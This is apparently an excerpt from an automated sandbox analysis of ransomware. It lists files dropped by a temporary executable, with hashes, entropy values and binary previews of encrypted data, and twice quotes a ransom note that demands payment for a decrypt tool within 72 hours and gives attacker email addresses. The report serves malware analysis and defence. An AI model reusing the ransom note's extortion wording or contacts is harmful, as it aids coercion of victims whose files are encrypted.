                                                                                                                                              Preview:.`.r9U..WD...Rj[..}B.c.........:`.N.....A!.........~.....RI'..."................ @..~5...F"i`.n.H......&...]..b....,....9.....0....l-z<'.,..:.N.<.A....*...#pz{.#.,.k.w.>V.F...;VT^p....X..s..@.#....../z.%{...w.@.Us.B=&.l.y!d5rdL.........1........0.Q......m.4.........x(....;..5..Z...#;.....G*..%B..g.a..E./0...a.H.9.'......w#:.....M..^^9.w.:~..b."....y"J..G..{mt.d7b......j.U..Hf.n1,f.....Y...#...w..x.mG.Ww.e....r.>A@....~..#..g.rQ..}..........j.P.L.wO8...B+.....D.Y.8hZ..A.'.f..'D.hVh.+{..u......t..k.U.....b....d..o.SN.......y...r.w.Z.........u.A.0M..&..G2`.,.::\.}......&..p..<.V.d.......Enf..)o.........v..`.x.C.qh7..K.G.].q ...er|H3K.m#nTi.E!J..6.k........nX.........3.M..W8[.G.y.r....\...l$..4a.J..>......I....\3...{.O.r*VG]..Y.Bf.Q..(I.Y..0Pqb.ig.c.2 U.Y...Lx..n|....1]....!..}.I.......L...|....y..2/.d.|(n..Z.#fv..s.=.0....1..........<a........M.F......w.....3.)..h...JG9..;......I.'....E..e..j....i.l.'...C..".4@#.>./.Tf.'...;f.d`w"...Y
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.815317560628938
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:O0tvNhfKFmq/i+Gq3gTj1KEJ2I9tQe5yjhMm4ibkHaUaOiVvBTIPRYt/:N1KMqtwzJvoMiIaUgVZTt/
                                                                                                                                              MD5:EF034581D214B125F13ADA90CB496901
                                                                                                                                              SHA1:EC5B469D8CD254966162778AB975D5164412D040
                                                                                                                                              SHA-256:1BE629931C83AE15704E8720CE1CDA1F737032E2FE8D126A9F9D36948B2605E9
                                                                                                                                              SHA-512:B6549783E121CD995729F37DE0BCBCA271C75917951E1B936F282020AA4F1AE74AFAE3FB5360AFF3AB35ED9DDCE8F6E4D4E42B2D563DC4A40CC10100C1B1EE02
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:'S.T.....i.x ...vd...5^.....)..^...3..F.K....i.......,.x.4....f....@.......g....I..7c..(\.S.V...D....Z..."......J+.O.'Hj#....pUn..A...0.S..X(..`.pl...~..h..........|..E.'...#k..........?.c{ 9........./v }T.....}x.*..7.....Yw.....g=d...c..{.y..e.b.......x..{.m.K..W..L.(.{.E..]..gQ...=00......+.`.-b./p..\{...^j"..~9..gN.qVI.....].I.|q.j/.{L.Z...<g..I... ..z ..w.]$)..e.....8.C.T........Q.(..A;4...xe..=........$%-...eu.....V...`9.D....;*8.Y.4..".?,..g..?.oT........7.p..DI$..\..1I..)."".Z....).p.......V.2. ..{.r..i. ....G...t.........b...c..,L';IdzV..K....0j]k....j.!..]..z..x.Zi..n.^)..Dz|.f......q...a..!3C.{D.>v...V.....0.{.xU....6XnP....>...$.Wd.Ec ...Z.........S.WU.Q.Q....x..lr......o..D.u..'Tg./....iA.6%2..G)..^{...k.<..*..)f?C.)X...."../..,.....HU.......'.$.~P..C@.t5..x..M..\......w..-........YB......~I..T!J.v]*..`$.R}...FQ..".~..*.l.....K.......1m....dYd...U....~dJ.X.D....@.I..U..}6..P.........q.r....5=.....c9..~.?v.4.~....8K.......C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.815317560628938
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:O0tvNhfKFmq/i+Gq3gTj1KEJ2I9tQe5yjhMm4ibkHaUaOiVvBTIPRYt/:N1KMqtwzJvoMiIaUgVZTt/
                                                                                                                                              MD5:EF034581D214B125F13ADA90CB496901
                                                                                                                                              SHA1:EC5B469D8CD254966162778AB975D5164412D040
                                                                                                                                              SHA-256:1BE629931C83AE15704E8720CE1CDA1F737032E2FE8D126A9F9D36948B2605E9
                                                                                                                                              SHA-512:B6549783E121CD995729F37DE0BCBCA271C75917951E1B936F282020AA4F1AE74AFAE3FB5360AFF3AB35ED9DDCE8F6E4D4E42B2D563DC4A40CC10100C1B1EE02
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:'S.T.....i.x ...vd...5^.....)..^...3..F.K....i.......,.x.4....f....@.......g....I..7c..(\.S.V...D....Z..."......J+.O.'Hj#....pUn..A...0.S..X(..`.pl...~..h..........|..E.'...#k..........?.c{ 9........./v }T.....}x.*..7.....Yw.....g=d...c..{.y..e.b.......x..{.m.K..W..L.(.{.E..]..gQ...=00......+.`.-b./p..\{...^j"..~9..gN.qVI.....].I.|q.j/.{L.Z...<g..I... ..z ..w.]$)..e.....8.C.T........Q.(..A;4...xe..=........$%-...eu.....V...`9.D....;*8.Y.4..".?,..g..?.oT........7.p..DI$..\..1I..)."".Z....).p.......V.2. ..{.r..i. ....G...t.........b...c..,L';IdzV..K....0j]k....j.!..]..z..x.Zi..n.^)..Dz|.f......q...a..!3C.{D.>v...V.....0.{.xU....6XnP....>...$.Wd.Ec ...Z.........S.WU.Q.Q....x..lr......o..D.u..'Tg./....iA.6%2..G)..^{...k.<..*..)f?C.)X...."../..,.....HU.......'.$.~P..C@.t5..x..M..\......w..-........YB......~I..T!J.v]*..`$.R}...FQ..".~..*.l.....K.......1m....dYd...U....~dJ.X.D....@.I..U..}6..P.........q.r....5=.....c9..~.?v.4.~....8K.......C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.855010591134436
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:veaFJ7ZWFc22FeC+tQOh2cJPXNpog1GET1Osyv6hx5E+N+dowzuu+5Or+Qq1hS:BJn22BqQfcJ/NpvROYxH+V7+5D0
                                                                                                                                              MD5:194926E45550FFE0F9E2E96F44A7E54C
                                                                                                                                              SHA1:C6E9F92D941ADF850A8465173DA28E0C3E4029A8
                                                                                                                                              SHA-256:DDCB2888301B70C9856C6642B3417F2B46E6366B0F31C304D8A99A1615B96489
                                                                                                                                              SHA-512:81F7410E58AB0FD2995C7ECC40A45228B1950BC97773489361390A51E97C48AB2C2EA1650097121F45741AD950849F8FC2F3ED2930E0C43466502AA7728D8964
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..@#b`.X..4...75E.>.V..g.l:.4].0'"c..6u.\\..o....`{.DG..3.8...G.+y.H{.Lk..-.s^..5<...w.*......g|..Q...'{...Mg.1.....1..!..>.5..\..s......#.%*2..lp.?..h..Am..l...0.J..*.c9..&..U.''.._..+.)....&.\........3|a.;?....V.S...2..W.Qy.@...U.n.......-.. ...%.L-h=.V&..H.I....,{{...Fo..!..%...^4.j.}.].F.G.....v.a..loG....2.....M....[..5......@1;~>4.wD.n#.x.f.]..V.b.Z._....,f.....~...x.I.^..F.]...Y.Kvr..r...z...um..l)3I8..!.ml........J....d{..K...%....j...r.L..g..;..w.L..~".......q..._.T.N...EVKz.3....H.t.Z.^9.y7..~.@n..$.F7.3G`.Nl.=..VG..#...<..XK...R......g.3:.....Q.T:j.].e1v...b......l..IS...z)8E.....9...}3P..".'lp.F..eg.yQ..F....4t52...z..; s0.....?.x..K_.&./>....!...!.&...:/.\....sb...Q.".5i.=q...'..;.."..Z..\Q...PG~../..v...|k.N...Z..dx....m.c:.&>.Qc......E3w......F..>....|."..5r....`.....)......W.:6_....|L..OY8/....Q.....^.....6.....@e.0)Q...@.)k......j..'.A.$Y...9?......R.Q|....*.D..Oc..T..B(q._\.8&.b...M..#t.......x...d....T....l.oD..6.&....V.O....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.855010591134436
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:veaFJ7ZWFc22FeC+tQOh2cJPXNpog1GET1Osyv6hx5E+N+dowzuu+5Or+Qq1hS:BJn22BqQfcJ/NpvROYxH+V7+5D0
                                                                                                                                              MD5:194926E45550FFE0F9E2E96F44A7E54C
                                                                                                                                              SHA1:C6E9F92D941ADF850A8465173DA28E0C3E4029A8
                                                                                                                                              SHA-256:DDCB2888301B70C9856C6642B3417F2B46E6366B0F31C304D8A99A1615B96489
                                                                                                                                              SHA-512:81F7410E58AB0FD2995C7ECC40A45228B1950BC97773489361390A51E97C48AB2C2EA1650097121F45741AD950849F8FC2F3ED2930E0C43466502AA7728D8964
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..@#b`.X..4...75E.>.V..g.l:.4].0'"c..6u.\\..o....`{.DG..3.8...G.+y.H{.Lk..-.s^..5<...w.*......g|..Q...'{...Mg.1.....1..!..>.5..\..s......#.%*2..lp.?..h..Am..l...0.J..*.c9..&..U.''.._..+.)....&.\........3|a.;?....V.S...2..W.Qy.@...U.n.......-.. ...%.L-h=.V&..H.I....,{{...Fo..!..%...^4.j.}.].F.G.....v.a..loG....2.....M....[..5......@1;~>4.wD.n#.x.f.]..V.b.Z._....,f.....~...x.I.^..F.]...Y.Kvr..r...z...um..l)3I8..!.ml........J....d{..K...%....j...r.L..g..;..w.L..~".......q..._.T.N...EVKz.3....H.t.Z.^9.y7..~.@n..$.F7.3G`.Nl.=..VG..#...<..XK...R......g.3:.....Q.T:j.].e1v...b......l..IS...z)8E.....9...}3P..".'lp.F..eg.yQ..F....4t52...z..; s0.....?.x..K_.&./>....!...!.&...:/.\....sb...Q.".5i.=q...'..;.."..Z..\Q...PG~../..v...|k.N...Z..dx....m.c:.&>.Qc......E3w......F..>....|."..5r....`.....)......W.:6_....|L..OY8/....Q.....^.....6.....@e.0)Q...@.)k......j..'.A.$Y...9?......R.Q|....*.D..Oc..T..B(q._\.8&.b...M..#t.......x...d....T....l.oD..6.&....V.O....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.840163808586466
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:741XjQGmehiusKQpCrYx3TqR1B1fiOLOlyl3lQsY0ouYqzESLPr:2QGmXBKQMYlqR1B1fROl4CsYZuY+X
                                                                                                                                              MD5:67520D91A08A9A6CC2AD41FF7EC93906
                                                                                                                                              SHA1:645BE9BDB645E8B0BB71E04318375DA629071BF8
                                                                                                                                              SHA-256:7267036DFA59466525B91203EEE7D993C34FAEE16DDCB4F42D3C00A4A49F7582
                                                                                                                                              SHA-512:FE33E6625DE9B7A1DB951D382FB57500F8C5D97D5EFB92703CDD7FFD9E826D551FFC6D8F44B1A48115312BA7CDDD81678F4BB7B91E96E0B7EBEC069BFE988FC9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L.........A........._Z.\..\.3.Yl..T.R.qM..4..3..-..........d. ...{1...-?.O.\NIL.+...d..4j. ..0...m.XE...i6...P.h.#..|#Sv.:..Ae.A.<..Ec.....U.0..+n5M,.K....?..U....k..Q.~u.:/.s.....N+.<..^..$.?i..../..n.y.....e......qMP...?...E..1..B..T..9=...$......n.z3\y".2..@.@.\..QV....:...MA..}...&Z...N ...g.3.%>1.Fe..s......(Si&.=.tx.. ...n....Ov.+|>.F."..L.B.._v......r..OO.C....)Z.E.{n ...6.~'...v.....oK.R.9YM......n.Q..L.XV.S......(.i.hWa....|.Y)...P_.....A.[j.8....A$....Z@.}......HxcR[t3..us...!....G.....E.d0...U........K.Y."@.P.q...D..*.>.[..X~...c...p...A.Y|....a....?.H.........o....H...Q~Q.4/W..L$V.I.5H.\.;.a...._....p...a.(....7B.Y....N.....a...x........eG.....2..T.DU.,&.m...7k.......6....[L......Y..9..fn.A=.{..C.`@G....r...d..g.,.w..e`g...R.f....+...mh..w.\!.n9..x.A]...`....i[ZXC...i.0...;.d..Y...IN:...hB.t...u..v.f..t./\.......2..!.N."f..@N..."...}.....gN.h.O}..]w..b/&....x.9.p`.F.....#&..\?..9.O...7....../$7..$pV.c.a.AF=x.%..J3...VV'.$
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.840163808586466
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:741XjQGmehiusKQpCrYx3TqR1B1fiOLOlyl3lQsY0ouYqzESLPr:2QGmXBKQMYlqR1B1fROl4CsYZuY+X
                                                                                                                                              MD5:67520D91A08A9A6CC2AD41FF7EC93906
                                                                                                                                              SHA1:645BE9BDB645E8B0BB71E04318375DA629071BF8
                                                                                                                                              SHA-256:7267036DFA59466525B91203EEE7D993C34FAEE16DDCB4F42D3C00A4A49F7582
                                                                                                                                              SHA-512:FE33E6625DE9B7A1DB951D382FB57500F8C5D97D5EFB92703CDD7FFD9E826D551FFC6D8F44B1A48115312BA7CDDD81678F4BB7B91E96E0B7EBEC069BFE988FC9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:L.........A........._Z.\..\.3.Yl..T.R.qM..4..3..-..........d. ...{1...-?.O.\NIL.+...d..4j. ..0...m.XE...i6...P.h.#..|#Sv.:..Ae.A.<..Ec.....U.0..+n5M,.K....?..U....k..Q.~u.:/.s.....N+.<..^..$.?i..../..n.y.....e......qMP...?...E..1..B..T..9=...$......n.z3\y".2..@.@.\..QV....:...MA..}...&Z...N ...g.3.%>1.Fe..s......(Si&.=.tx.. ...n....Ov.+|>.F."..L.B.._v......r..OO.C....)Z.E.{n ...6.~'...v.....oK.R.9YM......n.Q..L.XV.S......(.i.hWa....|.Y)...P_.....A.[j.8....A$....Z@.}......HxcR[t3..us...!....G.....E.d0...U........K.Y."@.P.q...D..*.>.[..X~...c...p...A.Y|....a....?.H.........o....H...Q~Q.4/W..L$V.I.5H.\.;.a...._....p...a.(....7B.Y....N.....a...x........eG.....2..T.DU.,&.m...7k.......6....[L......Y..9..fn.A=.{..C.`@G....r...d..g.,.w..e`g...R.f....+...mh..w.\!.n9..x.A]...`....i[ZXC...i.0...;.d..Y...IN:...hB.t...u..v.f..t./\.......2..!.N."f..@N..."...}.....gN.h.O}..]w..b/&....x.9.p`.F.....#&..\?..9.O...7....../$7..$pV.c.a.AF=x.%..J3...VV'.$
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8508468204201645
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:UNQ2ofEvEoqOMoBNnLNZkRKvZfuDccut1UqRuNbh9CnZT/Jm2s69+dk05K:Agfu13nP4KIDccutiqRch9kZAu9+dPY
                                                                                                                                              MD5:87E78E9E8BD761C44425AA2C018A9EBD
                                                                                                                                              SHA1:7E0F6215BEDB23E641EE47AFD7533D1988B2FA70
                                                                                                                                              SHA-256:6CB2B74CFAD71E1023978B540672EAACAB7344AF8D22CCF7C0B32CFEDADD1237
                                                                                                                                              SHA-512:0A319F91BFA2814448FAF43395F66227F2F499585CF57FC91E31D5BE69657C3CC3B3CE0E0FE76AF2F4B131D66F6C7CB2EBDA6E3ED6BBD2F28D0E7F3C0B8D2C4D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..;..".h........L{.1.`.rx...~..y....h]C"...x.=..MJA.h..}.."?}a......_....C.+..w9..#CV....D..b.#....=..a..Zt,.0.....a...[.Cd.....W..}.R...0...l6J.....E.9.. c..w..h.s...}....HE.ON....."..n....#.\.oO..&.j.1~..B'.>-...f. ..@..v+G..b}..$~.Uv.\..;...B6..!.g....c...l..s...,..t..K[..f....*r_.y..F.g%c...N&.....\o..*.{..4w.6.<........5r.G...fH...p0..N. t{P`.......K....WPA.1e.%J^ =.K....&.....V.:....3.......y.".\.....N...&..$..-.RX...H.A..).,$.'i..x.d..... .....<P.._..M..**..b..V..x..4.....e..2...J..p..).^t..].441h.^.2..c....y.........^..6@.tR.Y..Mr.8.V......<...C..F.}....&Cjc..../..oG.(.v..,.........^....0#.*..r.LKS".'!3Nr.....Rg.D..K.C.J......x....."J..<.B....$.....d..M.y..%.,A......\..).L3.9.#..Z*.s.|..m-.ve..B..O....P._............u.*..AU.......Z.F...../....B......^.6....#R.A.......t..{<.lv...0....../>.s....59.7Z./WF`v.^.....T.%0.c......6..G.{.>.S..u..kOv..2.i....d.....{F.....F....Y5j".....,.....7..d.E.b....8......>...YU,.~........M.T...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8508468204201645
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:UNQ2ofEvEoqOMoBNnLNZkRKvZfuDccut1UqRuNbh9CnZT/Jm2s69+dk05K:Agfu13nP4KIDccutiqRch9kZAu9+dPY
                                                                                                                                              MD5:87E78E9E8BD761C44425AA2C018A9EBD
                                                                                                                                              SHA1:7E0F6215BEDB23E641EE47AFD7533D1988B2FA70
                                                                                                                                              SHA-256:6CB2B74CFAD71E1023978B540672EAACAB7344AF8D22CCF7C0B32CFEDADD1237
                                                                                                                                              SHA-512:0A319F91BFA2814448FAF43395F66227F2F499585CF57FC91E31D5BE69657C3CC3B3CE0E0FE76AF2F4B131D66F6C7CB2EBDA6E3ED6BBD2F28D0E7F3C0B8D2C4D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..;..".h........L{.1.`.rx...~..y....h]C"...x.=..MJA.h..}.."?}a......_....C.+..w9..#CV....D..b.#....=..a..Zt,.0.....a...[.Cd.....W..}.R...0...l6J.....E.9.. c..w..h.s...}....HE.ON....."..n....#.\.oO..&.j.1~..B'.>-...f. ..@..v+G..b}..$~.Uv.\..;...B6..!.g....c...l..s...,..t..K[..f....*r_.y..F.g%c...N&.....\o..*.{..4w.6.<........5r.G...fH...p0..N. t{P`.......K....WPA.1e.%J^ =.K....&.....V.:....3.......y.".\.....N...&..$..-.RX...H.A..).,$.'i..x.d..... .....<P.._..M..**..b..V..x..4.....e..2...J..p..).^t..].441h.^.2..c....y.........^..6@.tR.Y..Mr.8.V......<...C..F.}....&Cjc..../..oG.(.v..,.........^....0#.*..r.LKS".'!3Nr.....Rg.D..K.C.J......x....."J..<.B....$.....d..M.y..%.,A......\..).L3.9.#..Z*.s.|..m-.ve..B..O....P._............u.*..AU.......Z.F...../....B......^.6....#R.A.......t..{<.lv...0....../>.s....59.7Z./WF`v.^.....T.%0.c......6..G.{.>.S..u..kOv..2.i....d.....{F.....F....Y5j".....,.....7..d.E.b....8......>...YU,.~........M.T...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.845639834435836
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:zquyNq2YXpT5yi54bG570K1YprBRU8si6ajEivPa9bZuH:2DqfXpT5r5D70K1qw8sqa9bUH
                                                                                                                                              MD5:17E063D97667B6C801BE14B62C77EC7D
                                                                                                                                              SHA1:9E3C1878A2F260E30B23B2DC2933AC52828B840B
                                                                                                                                              SHA-256:46AD59E39155FD0CE302669A6F86016606BA39618A1311973EEA90F5CAF19A91
                                                                                                                                              SHA-512:317B551E052524D0F6A631D714B29E6F41B51FDA601F52173A04D9358802E65591D38F10DC9576ACADF1D0465D993842928BCC75231572C7D647EA7826563238
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....$...;.o.....~.f..q.q...)....sl..=...mq.W.......u.....z...v.?.x.._."...T...s=...W$..rLt J&\...!:.....eh..kU]W..\B..\.'..:.*.H"..6ZN.g.p....o.`.?O.._...*.n....K-.f..5.`.&..STt..Q...lT v.U..+..S.F...Z.XR....aX..7...U*.N.sA@.~.~..)l.....Sv.y...!..m-"..{s.....^...V.=..y1K..#dL.k3.z.....{..49....EP0.f}(}..#K..c7..#@..7=.(..9^._)D.2O.N.U..L...+....".U.b.E.......".0.g...n..y.{..b.SN.. !....D..... .....g.W.U.m?9n...W.........J......S.....x.8.(....W.._.k.Q.~.v...k.;.c....$..yciQ.E..*.Qr..&.&.Iv...A.CM..+..^.8.RgA9...p.......N..#|../........$.._.\....(5..9..i/....}u..t#^q..P....b.....bS&.....#v.v7`..G1.e%m6....k.X.......a.H?....~...5.`....KN.....8...Fd..ZtU... ..N"}.....Y..Y4.V...j.Fr_..#....ZS$....zl....{...km...ZR=P<...OG:........7.."...t{.x@....QTA.......'..?.Q...Oc..}..i..s.V..Z.;..e=_.....-.....A..."."...v..Xv..Tx......2).h%......9J..0*.....5...G..d......O.K#{..?Q(f....s8........<^so..IZ..e....u-T..d>1k.p.OJ.......Lu......3.......0
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.845639834435836
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:zquyNq2YXpT5yi54bG570K1YprBRU8si6ajEivPa9bZuH:2DqfXpT5r5D70K1qw8sqa9bUH
                                                                                                                                              MD5:17E063D97667B6C801BE14B62C77EC7D
                                                                                                                                              SHA1:9E3C1878A2F260E30B23B2DC2933AC52828B840B
                                                                                                                                              SHA-256:46AD59E39155FD0CE302669A6F86016606BA39618A1311973EEA90F5CAF19A91
                                                                                                                                              SHA-512:317B551E052524D0F6A631D714B29E6F41B51FDA601F52173A04D9358802E65591D38F10DC9576ACADF1D0465D993842928BCC75231572C7D647EA7826563238
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....$...;.o.....~.f..q.q...)....sl..=...mq.W.......u.....z...v.?.x.._."...T...s=...W$..rLt J&\...!:.....eh..kU]W..\B..\.'..:.*.H"..6ZN.g.p....o.`.?O.._...*.n....K-.f..5.`.&..STt..Q...lT v.U..+..S.F...Z.XR....aX..7...U*.N.sA@.~.~..)l.....Sv.y...!..m-"..{s.....^...V.=..y1K..#dL.k3.z.....{..49....EP0.f}(}..#K..c7..#@..7=.(..9^._)D.2O.N.U..L...+....".U.b.E.......".0.g...n..y.{..b.SN.. !....D..... .....g.W.U.m?9n...W.........J......S.....x.8.(....W.._.k.Q.~.v...k.;.c....$..yciQ.E..*.Qr..&.&.Iv...A.CM..+..^.8.RgA9...p.......N..#|../........$.._.\....(5..9..i/....}u..t#^q..P....b.....bS&.....#v.v7`..G1.e%m6....k.X.......a.H?....~...5.`....KN.....8...Fd..ZtU... ..N"}.....Y..Y4.V...j.Fr_..#....ZS$....zl....{...km...ZR=P<...OG:........7.."...t{.x@....QTA.......'..?.Q...Oc..}..i..s.V..Z.;..e=_.....-.....A..."."...v..Xv..Tx......2).h%......9J..0*.....5...G..d......O.K#{..?Q(f....s8........<^so..IZ..e....u-T..d>1k.p.OJ.......Lu......3.......0
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.863298115800374
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:gNdT/7MvxH49+XV2aIwJR7i94ZsUOO5KTOSMCaJREdQYVHT:idjwvxHxYaIwvtZs4GMv3Eq2
                                                                                                                                              MD5:874DEA891E9BABDF9926F3A4B14B5D2A
                                                                                                                                              SHA1:EB997296A8CC0B47EF5F14131CACB9CDF4B592D7
                                                                                                                                              SHA-256:3F9498FFB4217CBA7B90B7738886716E0A826034F71AA7599C07106FDF434A6E
                                                                                                                                              SHA-512:6FB66FC7C0548CFAEE068C72C2543DA81E837E63D898166CECB30794970E5D1F3A74A6552F55AC5FE1B80A3E185C8EC10165377F15FCDE459214E5F75BA405A2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview::...%h4..J...!..\BM....>.....K.7......o3`.KG.@..:5L..i.e...y5...^....Uq.;.A/qp.u.6YY..b.8...v.T6..5..D...TX.lD.)Ob....|N.b.[X.`..........l..2........8..j#K.%G..Uj\wE.Z.....~....FX.j...:7. q.."..~g.).....&.q...... .....mx...$S......R.u.L..t...'\.....:=2......Bi..IB`.F.l...0m..+..:...xv.r....JT<.H..u.I...I.O%.)p{[........GeR..............!R..#\9...p....F.b....i..5..{.....O..{3..~.*.@...}.X.g>.\..Y...O./=.O.u.2v......c..".../+PF...u...}.96K#.......k3.[m.5.......b..fB._..B*...J...z..;.W...|.E...A....kC.z..t.a.7........_L.....U...h+@m.8....I.kF.OP....,E..~m....C.;|".~.}=...7.#.=.M=.j.Ya$.}t.y.p.. +*;.w).........$T..u;...C./..........n2..5..t...^s.......'?..yJ*_...>......#..}.....P...W.......x.M..;....@.`......Zg...C+....].....p....y.......s.K...}....x..k.r...$...F..1.3...._....nn.../..g.+.k..}....S?..H.....y...m...N....l@=.g3...E..z9..F.4.......C......+......D.V..Q.F.d7...a...J.......]......b?*.m.GR-.0.{..6o....?+&rf..3.....90S..).....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.863298115800374
                                                                                                                                              Encrypted:false
